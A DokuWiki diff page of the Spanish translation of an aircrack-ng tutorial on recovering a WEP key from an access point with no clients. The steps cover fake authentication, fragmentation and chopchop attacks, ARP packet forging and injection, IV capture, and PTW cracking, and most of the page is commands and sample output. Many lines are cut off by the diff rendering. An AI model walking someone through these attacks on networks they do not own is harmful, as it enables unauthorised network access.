spanish_how_to_crack_wep_with_no_clients
Differences
This shows you the differences between two versions of the page.
Next revision | Previous revisionLast revisionBoth sides next revision | ||
spanish_how_to_crack_wep_with_no_clients [2007/02/23 21:57] – created spanish | spanish_how_to_crack_wep_with_no_clients [2007/07/17 20:54] – spanish | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | | + | ====== |
- | Tabla de Contenidos | + | Version: 1.09 de 16 de Mayo de 2007\\ |
- | + | By: darkAudax\\ | |
- | * | + | Video: http:// |
- | | + | Traducción: |
- | o | + | |
- | Introducción | + | |
- | o | + | |
- | Puntos de partida | + | |
- | o | + | |
- | Equipo usado | + | |
- | o | + | |
- | Solución | + | |
- | + | + | |
- | Contenidos | + | |
- | + | + | |
- | Paso 1 - Fijar la dirección MAC de la tarjeta wireless | + | |
- | + | + | |
- | Paso 2 - Colocar la interface wireless en modo monitor y fijar el canal | + | |
- | + | + | |
- | Paso 3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso | + | |
- | + | + | |
- | Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA | + | |
- | + | + | |
- | Paso 5 - Usar packetforge-ng para crear un paquete arp | + | |
- | + | + | |
- | Paso 6 - Iniciar airodump-ng | + | |
- | + | + | |
- | Paso 7 - Inyectar el paquete arp | + | |
- | + | + | |
- | Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP | + | |
- | o | + | |
- | Change Log | + | |
- | + | ||
- | Tutorial: Como crackear WEP sin clientes | + | |
- | + | ||
- | Traducción al español de: | + | |
- | http:// | + | |
- | Version: 1.02. de 10 de Febrero | + | |
- | By: darkAudax | + | |
- | Video: http:// | + | |
- | Introducción | + | |
+ | ===== Introducción ===== | ||
Hay muchas veces que encontramos redes wireless que no tienen clientes conectados. Este tutorial describe como obtener la clave WEP cuando no hay clientes. Aunque este tema ha sido discutido muchas veces en el Foro, este tutorial está hecho con la intención de entrar en más detalles y poner algunos ejemplos. | Hay muchas veces que encontramos redes wireless que no tienen clientes conectados. Este tutorial describe como obtener la clave WEP cuando no hay clientes. Aunque este tema ha sido discutido muchas veces en el Foro, este tutorial está hecho con la intención de entrar en más detalles y poner algunos ejemplos. | ||
Line 49: | Line 13: | ||
Por favor, enviame cualquier sugerencia, positiva o negativa. Bien sean problemas o buenas ideas serán bienvenidas. | Por favor, enviame cualquier sugerencia, positiva o negativa. Bien sean problemas o buenas ideas serán bienvenidas. | ||
- | Puntos de partida | + | |
+ | |||
+ | ===== Puntos de partida | ||
Suponemos que: | Suponemos que: | ||
- | * | + | * Estás usando drivers parcheados para inyección. Puedes capturar paquetes con Wireshark para comprobar si estás inyectando. |
- | | + | * Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerda que recibir paquetes del punto de acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean recibidos por el AP. Deberías confirmar que te puedes comunicar con el AP siguiendo [[http:// |
- | * | + | * No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como " |
- | | + | * El punto de acceso usa encriptación WEP abierta (open authentication). No funcionará si la autentificación es compartida (shared key authentication) (SKA). Con SKA el único método si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es así porque necesitas el archivo PRGA xor para hacer una falsa autenticación de forma exitosa. |
- | * | + | * Usamos la versión 0.9 de aircrack-ng. Si usas otra versión algunos comandos puede que se tengan que escribir de forma diferente. |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
Asegurate de que cumples todas las condiciones, | Asegurate de que cumples todas las condiciones, | ||
- | Equipo usado | + | |
+ | En los ejemplos, la opción " | ||
+ | |||
+ | |||
+ | ===== Equipo usado ===== | ||
En este tutorial: | En este tutorial: | ||
- | * | + | * Dirección MAC del PC ejecutando la suite aircrack-ng: |
- | | + | * BSSID (dirección MAC del punto de acceso): 00: |
- | * | + | * ESSID (nombre de la red Wireless): teddy |
- | | + | * Canal del AP: 9 |
- | * | + | * Interface Wireless: ath0 |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
Tienes que obtener la información equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos. | Tienes que obtener la información equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos. | ||
- | Solución | + | |
- | Contenidos | + | ===== Solución |
+ | |||
+ | ==== Contenidos | ||
Aquí estań los pasos que vamos a seguir: | Aquí estań los pasos que vamos a seguir: | ||
- | * | + | *1 - Fijar la dirección MAC de la tarjeta wireless |
- | | + | *2 - Colocar la interface wireless en modo monitor y fijar el canal |
- | * | + | *3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso |
- | | + | *4 - Usar chopchop o ataque de fragmentación para obtener PRGA |
- | * | + | *5 - Usar packetforge-ng para crear un paquete arp usando el PRGA obtenido en el paso anterior |
- | | + | *6 - Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs |
- | * | + | *7 - Inyectar el paquete arp creado en el paso 5 |
- | | + | *8 - Ejecutar aircrack-ng para obtener la clave WEP |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | Paso 1 - Fijar la dirección MAC de la tarjeta wireless | + | |
+ | ==== Paso 1 - Fijar la dirección MAC de la tarjeta wireless | ||
Para ser honesto, nosotros no hemos cambiado la dirección MAC de nuestra tarjeta. | Para ser honesto, nosotros no hemos cambiado la dirección MAC de nuestra tarjeta. | ||
- | Esto es un recordatorio para que uses tu dirección MAC real y no una falsa. En el paso 3 es importante que la dirección MAC que se use sea la de la nuestra tarjeta, para realizar la falsa autenticación. Si quieres cambiar la dirección MAC de tu tarjeta puedes consultar este : post en inglés FAQ. | + | Esto es un recordatorio para que uses tu dirección MAC real y no una falsa. En el paso 3 es importante que la dirección MAC que se use sea la de la nuestra tarjeta, para realizar la falsa autenticación. Si quieres cambiar la dirección MAC de tu tarjeta puedes consultar este : post en inglés FAQ[[http:// |
- | Paso 2 - Colocar la interface wireless en modo monitor y fijar el canal | + | |
+ | ==== Paso 2 - Colocar la interface wireless en modo monitor y fijar el canal ==== | ||
Escribe el siguiente comando para poner la tarjeta wireless | Escribe el siguiente comando para poner la tarjeta wireless | ||
Line 118: | Line 74: | ||
El sistema nos responderá: | El sistema nos responderá: | ||
- | Interface | + | Interface |
- | + | | |
- | | + | |
- | | + | |
Puedes observar que “ath0” aparece colocada en modo monitor. | Puedes observar que “ath0” aparece colocada en modo monitor. | ||
Line 131: | Line 87: | ||
El sistema nos responderá: | El sistema nos responderá: | ||
- | lo no wireless extensions. | + | lo no wireless extensions. |
- | + | | |
- | | + | |
- | + | | |
- | | + | |
- | + | | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en " | Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en " | ||
Para ver la correspondencia entre frecuencia y canal, mira: http:// | Para ver la correspondencia entre frecuencia y canal, mira: http:// | ||
- | Problemas | ||
- | * | ||
- | Si tienes otra interface en modo monitor que no sea ath0, puedes usarla o escribir “airomon-ng stop athX” donde X es la interface que quieres parar. | ||
- | Paso 3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso | + | |
+ | === Problemas === | ||
+ | |||
+ | *Si tienes otra interface en modo monitor que no sea ath0, puedes usarla o escribir “airomon-ng stop athX” donde X es la interface que quieres parar. | ||
+ | |||
+ | |||
+ | |||
+ | ==== Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso | ||
Este es un paso muy importante. | Este es un paso muy importante. | ||
Line 169: | Line 129: | ||
Donde: | Donde: | ||
- | * | + | *-1 significa falsa autenticación (fake authentication) |
- | | + | *0 tiempo de reasociación en segundos |
- | * | + | *-e teddy es el nombre de la red wireless |
- | | + | *-a 00: |
- | * | + | *-h 00: |
- | | + | *ath0 es el nombre de nuestra interface |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
Si tenemos éxito aparecerá algo como esto: | Si tenemos éxito aparecerá algo como esto: | ||
- | + | | |
- | 18: | + | 18: |
- | 18: | + | 18: |
- | 18: | + | 18: |
- | 18: | + | |
Otra variación que puede funcionar en algunos puntos de acceso: | Otra variación que puede funcionar en algunos puntos de acceso: | ||
- | aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00: | + | |
Donde: | Donde: | ||
- | * | + | *6000 Reautenticación cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes de sigo aquí o "keep alive packets" |
- | | + | *-o 1 Envia solo un tipo de paquetes de cada vez. El valor por defecto es " |
- | * | + | *-q 10 Se envian paquetes de "sigo aquí" cada 10 segundos. |
- | | + | |
- | * | + | |
- | | + | |
Si tenemos éxito aparecerá algo como esto: | Si tenemos éxito aparecerá algo como esto: | ||
- | + | | |
- | 18: | + | 18: |
- | 18: | + | 18: |
- | 18: | + | 18: |
- | 18: | + | 18: |
- | 18: | + | 18: |
- | 18: | + | # etc.... |
- | # etc... | + | |
Ahora ponemos un ejemplo de un fallo de autenticación: | Ahora ponemos un ejemplo de un fallo de autenticación: | ||
+ | 8: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
+ | 18: | ||
- | 8: | + | Presta atención a “Got a deauthentication packet” y los continuos intentos de asociación. No se puede pasar al siguiente paso hasta que funcione la falsa autenticación de forma correcta. |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | 18: | + | |
- | Presta atenció a “Got a deauthentication packet” y los continuos intentos de asociación. No se puede pasar al siguiente paso hasta que funcione la falsa autenticación de forma correcta. | + | === Problemas |
- | Problemas | + | |
- | * | + | *Algunos puntos de acceso están configurados para permitir únicamente una dirección MAC para asociarse y conectarse. Si este es tu caso, no serás capaz de realizar la falsa autenticación de forma éxitosa, salvo que conozcas una de las direcciones MAC que están permitidas para poder conectarse a ese AP. Mira los problemas de filtrado MAC en [[http:// |
- | | + | |
- | * | + | *Si deseas confirmar que estás asociado de forma correcta puedes usar tcpdump y mirar los paquetes. Inicia una consola y escribe: |
- | | + | |
- | tcpdump -n -e -s0 -vvv -i ath0 | + | |
+ | tcpdump -n -e -s0 -vvv -i ath0 | ||
- | Un típico | + | A continuación puedes ver el mensaje de error que estamos buscando: |
- | 11: | + | 11: |
Presta atención que el punto de acceso (00: | Presta atención que el punto de acceso (00: | ||
- | Si solo quieres seleccionar los paquetes de deautenticación con tcpdump usa: “tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth”. Puedes cambiar la palabra “DeAuth” para escoger otros paquetes que quieras buscar. | + | Si solo quieres seleccionar los paquetes de deautenticación con tcpdump usa: “tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth”. Puedes cambiar la palabra “DeAuth” para escoger otros paquetes que quieras buscar. |
- | Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA | + | |
+ | |||
+ | |||
+ | ==== Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA ==== | ||
- | El objetivo de chopchop y del ataque de fragmentación es obtener un archivo PRGA (del ingles " | + | El objetivo de [[korek_chopchop|chopchop]] y del [[fragmentation|ataque de fragmentación]] es obtener un archivo PRGA (del ingles " |
- | Tanto chopchop como el ataque de fragmentación pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque están descritos en la página de aircrack-ng. | + | Tanto chopchop como el ataque de fragmentación pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque están descritos en la página de [[aircrack-ng.es|aircrack-ng]]. |
A continuación exponemos primero el ataque de fragmentación. Abrimos otra consola y escribimos: | A continuación exponemos primero el ataque de fragmentación. Abrimos otra consola y escribimos: | ||
Line 256: | Line 207: | ||
Donde: | Donde: | ||
- | * | + | *-5 significa ataque de fragmentación |
- | | + | *-b 00: |
- | * | + | *-h 00: |
- | | + | *ath0 es el nombre de nuestra interface |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | La respuesta que obtendremos será: | + | La respuesta que obtendremos será: |
- | aireplay-ng -5 -b 00: | + | aireplay-ng -5 -b 00: |
- | | + | |
- | Read 127 packets... | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
Cuando recibamos un paquete del punto de acceso, escribe “y” para continuar. Puede que sea necesario probar unos pocos paquetes para tener éxito. | Cuando recibamos un paquete del punto de acceso, escribe “y” para continuar. Puede que sea necesario probar unos pocos paquetes para tener éxito. | ||
- | Si tenemos éxito aparecerá algo como esto: | + | Si tenemos éxito aparecerá algo como esto: |
- | Saving chosen packet in replay_src-0203-180328.cap | + | Saving chosen packet in replay_src-0203-180328.cap |
- | Data packet found! | + | |
- | | + | |
- | Got RELAYED packet!! | + | |
- | Thats our ARP packet! | + | |
- | | + | |
- | Got RELAYED packet!! | + | |
- | Thats our ARP packet! | + | |
- | | + | |
- | Got RELAYED packet!! | + | |
- | Thats our ARP packet! | + | |
- | | + | |
- | Now you can build a packet with packetforge-ng out of that 1500 bytes keystream | + | |
- | Éxito! El archivo “fragment-0203-180343.xor” lo podremos usar en el siguiente paso para generar un paquete arp. | + | Éxito! El archivo “fragment-0203-180343.xor” lo podremos usar en el siguiente paso para generar un paquete arp. |
Si con el ataque de fragmentación no hemos tenido éxito, podemos probar la técnica chopchop. Para ello ejecuta: | Si con el ataque de fragmentación no hemos tenido éxito, podemos probar la técnica chopchop. Para ello ejecuta: | ||
Line 314: | Line 261: | ||
Donde: | Donde: | ||
- | * | + | *-4 significa ataque chopchop |
- | | + | *-h 00: |
- | * | + | *ath0 es el nombre de nuestra interface |
- | | + | |
- | * | + | |
- | | + | |
La respuesta que obtendremos será: | La respuesta que obtendremos será: | ||
- | | + | |
- | + | ||
- | | + | |
- | + | | |
- | | + | |
- | | + | |
- | | + | |
- | + | | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | + | ||
- | Use this packet ? y | + | |
Contesta "y” y el proceso continuará. | Contesta "y” y el proceso continuará. | ||
- | Saving chosen packet in replay_src-0201-191639.cap | + | Saving chosen packet in replay_src-0201-191639.cap |
- | + | | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | Sent 957 packets, current guess: B9... | + | |
- | + | | |
- | The AP appears to drop packets shorter than 35 bytes. | + | |
- | | + | |
- | + | | |
- | | + | |
- | | + | |
- | + | | |
- | | + | |
Fantástico! El archivo “replay_dec-0201-191706.xor” lo podremos usar en el siguiente paso para generar un paquete arp. | Fantástico! El archivo “replay_dec-0201-191706.xor” lo podremos usar en el siguiente paso para generar un paquete arp. | ||
- | Pequeñas ayudas | ||
- | * | + | === Pequeñas ayudas === |
- | Asegúrate de que el paquete es de 68 o más bytes porque sino no tendrás suficientes datos PRGA para generar el paquete. El PRGA capturado tiene que ser igual o mayor que la longitud del paquete que queremos generar. | + | |
- | * | + | |
- | Para generar algunos paquetes para forzar el comienzo de chopchop to start, haz ping a una IP inexistente de tu red. Esto forzará que el AP emita un "arp broadcast" | + | |
- | * | + | |
- | Puedes comprobar el paquete desencriptado ejecutando “tcpdump -n -vvv -e -s0 -r replay_dec-0201-191706.cap”. En nuestroejemplo: | + | |
- | reading from file replay_dec-0201-191706.cap, | + | *Asegúrate de que el paquete es de 68 o más bytes porque sino no tendrás suficientes datos PRGA para generar el paquete. El PRGA capturado tiene que ser igual o mayor que la longitud del paquete que queremos generar. |
+ | *Para generar algunos paquetes para forzar el comienzo de chopchop, haz ping a una IP inexistente de tu red. Esto forzará que el AP emita un "arp broadcast" | ||
+ | *Puedes comprobar el paquete desencriptado ejecutando “tcpdump -n -vvv -e -s0 -r replay_dec-0201-191706.cap”. En nuestroejemplo: | ||
+ | reading from file replay_dec-0201-191706.cap, | ||
+ | 19: | ||
+ | *Puedes reusar el paquete capturado ejecutando “aireplay-ng -4 ath0 -h 00: | ||
+ | *Si tienes un archivo de capturas de una sesión anterior, puedes usarlo con el comando “aireplay-ng -4 ath0 -h 00: | ||
- | * | ||
- | Puedes reusar el paquete capturado ejecutando “aireplay-ng -4 ath0 -h 00: | ||
- | * | ||
- | Si tienes un archivo de capturas de una sesión anterior, puedes usarlo con el comando “aireplay-ng -4 ath0 -h 00: | ||
- | Problemas | + | === Problemas |
- | | + | |
- | | + | *El ataque chopchop no funciona en algunos puntos de acceso. Si esto ocurre, prueba el ataque de fragmentación. Y viceversa. |
- | * | + | *Asegurate de que estás correctamente asociado al AP. Para comprobarlo sigue las instrucciones del paso 2 con tcpdump. |
- | | + | |
- | * | + | |
- | | + | |
- | Paso 5 - Usar packetforge-ng para crear un paquete arp | ||
- | En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA. Este PRGA se encuentra en los archivos con extensión “xor”. Podemos entonces usar este PRGA para generar un paquete para inyectar. Generaremos un paquete arp para la inyección. El objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP. | + | |
+ | |||
+ | ==== Paso 5 - Usar packetforge-ng para crear un paquete arp ==== | ||
+ | |||
+ | En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA. Este PRGA se encuentra en los archivos con extensión “xor”. Podemos entonces usar este PRGA para generar un paquete para inyectar. Generaremos un paquete arp para la inyección. El objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP. | ||
Pero primero vamos a generar el paquete arp para la inyección, escribiendo: | Pero primero vamos a generar el paquete arp para la inyección, escribiendo: | ||
Line 441: | Line 381: | ||
Donde: | Donde: | ||
- | * | + | *-0 significa generar un paquete arp |
- | | + | *-a 00: |
- | * | + | *-h 00: |
- | | + | *-k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255) |
- | * | + | *-l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255) |
- | | + | *-y fragment-0203-180343.xor es el archivo del que se leerá el PRGA |
- | * | + | *-w arp-request es el nombre del archivo en el que se guardará el paquete arp |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | La respuesta que obtendremos será: | + | La respuesta que obtendremos será: |
- | Wrote packet to: arp-request | + | Wrote packet to: arp-request |
- | Pequeñas ayudas | + | === Pequeñas ayudas |
- | | + | |
- | | + | |
- | tcpdump -n -vvv -e -s0 -r arp-request | + | tcpdump -n -vvv -e -s0 -r arp-request |
- | + | ||
- | | + | |
- | | + | |
Como estamos probando con nuestro propio AP (si no es así NO CONTINUES!), | Como estamos probando con nuestro propio AP (si no es así NO CONTINUES!), | ||
Line 474: | Line 406: | ||
Escribimos: " | Escribimos: " | ||
- | | ||
- | | ||
- | Paso 6 - Iniciar airodump-ng | + | |
+ | | ||
+ | | ||
+ | |||
+ | ==== Paso 6 - Iniciar airodump-ng | ||
Abrir otra consola para capturar los IVs generados. Y escribir: | Abrir otra consola para capturar los IVs generados. Y escribir: | ||
- | airodump-ng -c 9 –bssid 00: | + | airodump-ng -c 9 --bssid 00: |
Donde: | Donde: | ||
- | * | + | *-c 9 es el canal de la red wireless |
- | | + | *– -bssid 00: |
- | * | + | *– -ivs especifica que solo capturaremos IVs. Así el archivo será muy pequeño. Pero no uses esta opción si quieres utilizar " |
- | | + | *-w capture es el nombre del archivo en el que guardaremos los IVs. |
- | * | + | *ath0 es el nombre de nuestra interface. |
- | | + | |
- | * | + | |
- | | + | |
- | * | + | |
- | | + | |
- | Paso 7 - Inyectar el paquete arp | + | ==== Paso 7 - Inyectar el paquete arp ==== |
- | Usando la consola en la que generamos el paquete arp, escribimos: | + | Usando la consola en la que generamos el paquete arp, escribimos: |
aireplay-ng -2 -r arp-request ath0 | aireplay-ng -2 -r arp-request ath0 | ||
Line 504: | Line 433: | ||
Donde: | Donde: | ||
- | * | + | *-2 significa que usamos el modo interactivo para seleccionar el paquete |
- | | + | *-r arp-request especificamos el nombre del archivo con el paquete arp |
- | * | + | *ath0 es el nombre de nuestra interface |
- | | + | |
- | * | + | |
- | | + | |
Obtendremos la siguiente respuesta: | Obtendremos la siguiente respuesta: | ||
- | | + | |
- | + | ||
- | | + | |
- | | + | |
- | Source MAC = 00: | + | Source MAC = 00: |
- | + | ||
- | 0x0000: | + | 0x0000: |
- | 0x0010: | + | 0x0010: |
- | 0x0020: | + | 0x0020: |
- | 0x0030: | + | 0x0030: |
- | 0x0040: | + | 0x0040: |
- | + | ||
- | Use this packet ? y | + | Use this packet ? y |
Escribimos “y” para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todavía: | Escribimos “y” para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todavía: | ||
- | Saving chosen packet in replay_src-0204-104917.cap | + | Saving chosen packet in replay_src-0204-104917.cap |
- | You should also start airodump-ng to capture replies. | + | |
- | + | | |
- | End of file. | + | |
Mientras este comando se está ejecutando de forma exitosa, en la ventana de airodump-ng | Mientras este comando se está ejecutando de forma exitosa, en la ventana de airodump-ng | ||
- | CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04 | + | CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04 |
- | | + | |
- | BSSID PWR RXQ Beacons | + | BSSID PWR RXQ Beacons |
- | | + | |
- | 00: | + | 00: |
- | | + | |
- | BSSID STATION | + | BSSID STATION |
- | | + | |
- | 00: | + | 00: |
Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura a un único BSSID. Tambien observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyección está funcionando bien y se pierden pocos paquetesl. Tambien observa la velocidad de inyección (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyección está funcionando muy bien. Esta es una situación " | Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura a un único BSSID. Tambien observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyección está funcionando bien y se pierden pocos paquetesl. Tambien observa la velocidad de inyección (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyección está funcionando muy bien. Esta es una situación " | ||
- | Problemas | ||
- | * | + | === Problemas === |
- | Si los paquetes del BSSID (data) no aumentan asegurate de que estas todavía asociado con el punto de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2. | + | |
- | Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP | + | *Si los paquetes del BSSID (data) no aumentan asegurate de que estas todavía asociado con el punto de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2. |
+ | |||
+ | ==== Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP ==== | ||
Inicia otra consola y escribe: | Inicia otra consola y escribe: | ||
- | aircrack-ng | + | aircrack-ng |
Donde: | Donde: | ||
- | * | + | *-z significa que se use el método PTW para obtener más rápido la clave WEP |
- | *.ivs selecciona todos los archivos con extensión “ivs”. | + | |
- | * | + | *-b 00: |
- | | + | |
- | Puedes ejecutar aircrack-ng mientras capturas paquetes. En poco tiempo, verás la clave WEP. Necesitarás aproximadamente 250,000 IVs para una clave WEP de 64 bit y 500,000 IVs para claves de 128 bit. Esto es aproximado y hay muchas variables | + | Puedes ejecutar aircrack-ng mientras capturas paquetes. En poco tiempo, verás la clave WEP. Usando el método PTW, necesitarás alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para claves de 128 bit. Recuerda |
- | Problemas | + | |
- | * | + | Si no usas la opción |
- | Algunas veces es recomendable probar varias técnicas para obtener la clave WEP rápidamente. Prueba | + | |
- | Cambios | + | Problemas: |
+ | |||
+ | *Algunas veces es recomendable probar varias técnicas para obtener la clave WEP rápidamente. Prueba la opción “-n” para fijar la longitud de la clave (por ejemplo -n 64). Usa “-f” y prueba diferentes "fudge factors" | ||
+ | |||
+ | ===== Solución alternativa ===== | ||
+ | |||
+ | Existe un pequeño engaño que simplifica el crackeo de la clave WEP sin clientes. | ||
+ | |||
+ | Es importante que tengas en cuenta que si usas este truco, no podrás utilizar la opción " | ||
+ | |||
+ | OK, ahora te estarás preguntando ¿porque no te enseño esta técnica paso a paso? | ||
+ | |||
+ | Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa autenticación. | ||
+ | |||
+ | Escribe el siguiente comando: | ||
+ | |||
+ | | ||
+ | |||
+ | Donde: | ||
+ | *-2 significa que usamos el modo interactivo para seleccionar el paquete | ||
+ | *-p 0841 fija el "Frame Control" | ||
+ | *c FF: | ||
+ | *-b 00: | ||
+ | *-h 00: | ||
+ | *ath0 es el nombre de nuestra interface | ||
+ | |||
+ | El sistema nos contestará: | ||
+ | |||
+ | Read 698 packets... | ||
+ | |||
+ | Size: 86, FromDS: 1, ToDS: 0 (WEP) | ||
+ | |||
+ | | ||
+ | Dest. MAC = FF: | ||
+ | Source MAC = 00: | ||
+ | |||
+ | 0x0000: | ||
+ | 0x0010: | ||
+ | 0x0020: | ||
+ | 0x0030: | ||
+ | 0x0040: | ||
+ | 0x0050: | ||
+ | |||
+ | Use this packet ? y | ||
- | Febrero 16/2007 | + | Escribes " |
- | * | + | |
- | Añadido video de Offensive-Security | + | |
+ | Sent 10204 packets...(455 pps) | ||
- | Febrero 10/2007 v1.02 | + | Si aun no has iniciado airodump-ng, |
- | * | + | Otra variación |
- | Añadido como punto de partida que usamos autenticación abierta | + | |
- | Febrero 7/2007 v1.01 | + | A continuación puedes ver como sería el comando: |
- | * | + | |
- | Incorporada corrección hecha por cjaghblb | + | |
- | Febrero 4/2007 v1.00 | + | Donde "-r capture-01.cap" |
- | * | ||
- | Versión inicial | ||
- | |||
- | como_crackear_wep_sin_clientes.txt · Última modificación: | ||
- | |||
- | Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki | ||